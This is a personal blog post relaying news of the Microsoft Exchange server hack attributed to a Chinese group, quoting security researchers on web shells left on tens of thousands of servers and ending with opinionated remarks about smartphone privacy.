Yep, if you thought the “Velvet Sweatshop,” as their employees call Microsoft, was in the clear after plugging holes in the mega security breach of SolarWinds, you would be wrong. Yesterday, I saw this article reporting another huge securing breach, this time by China. (FYI that I know of, no one has taken credit for SolarWinds.)
The quiet release of an out of band patch for a flaw in Microsoft’s Exchange server is rapidly turning into a major story, with credible reports of at least 30,000 organizations in the USA, and possibly hundreds of thousands around the world, being hacked by a Chinese hacker group, who now has full control of the servers and the data on them.
Microsoft Exchange flaw may have led to 30,000+ US organizations being hacked
For those that don’t know, Microsoft Exchange is their flagship email server software.
Krebs on Security reports that a significant number of small businesses, towns, cities and local governments have been infected, with the hackers leaving behind a web shell for further command and control.
Microsoft said the original attacks were targetted at a range of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs, but Krebs notes that there has been a dramatic and aggressive escalation of the rate of infection, as the hackers try and stay ahead of the patch Microsoft released.
“We’ve worked on dozens of cases so far where web shells were put on the victim system back on Feb. 28 [before Microsoft announced its patches], all the way up to today,” said Volexity President Steven Adair, who discovered the attack . “Even if you patched the same day Microsoft published its patches, there’s still a high chance there is a web shell on your server. The truth is, if you’re running Exchange and you haven’t patched this yet, there’s a very high chance that your organization is already compromised.”
“It’s police departments, hospitals, tons of city and state governments and credit unions,” said one source who’s working closely with federal officials on the matter. “Just about everyone who’s running self-hosted Outlook Web Access and wasn’t patched as of a few days ago got hit with a zero-day attack.”
Folks, this is a really big deal but unless you read tech blogs, I doubt you’ve heard about this. Again, this breach includes schools, police departments, hospitals, financial institutions, and businesses. I encourage you to read the article which I linked above. I suspect we will hear more about this breach before long. Oh, and if you don’t that doesn’t mean everything is better.
Don’t forget that whatever the outcome of this most recent breach, your smart phones are sending all your text messages, address books, location, and other data to both China and Big Tech on a regular basis. Your privacy is an illusion in a digitally dependent world. How people use the information they are collecting is probably above my paygrade. If knowledge is power, then we’re likely in trouble…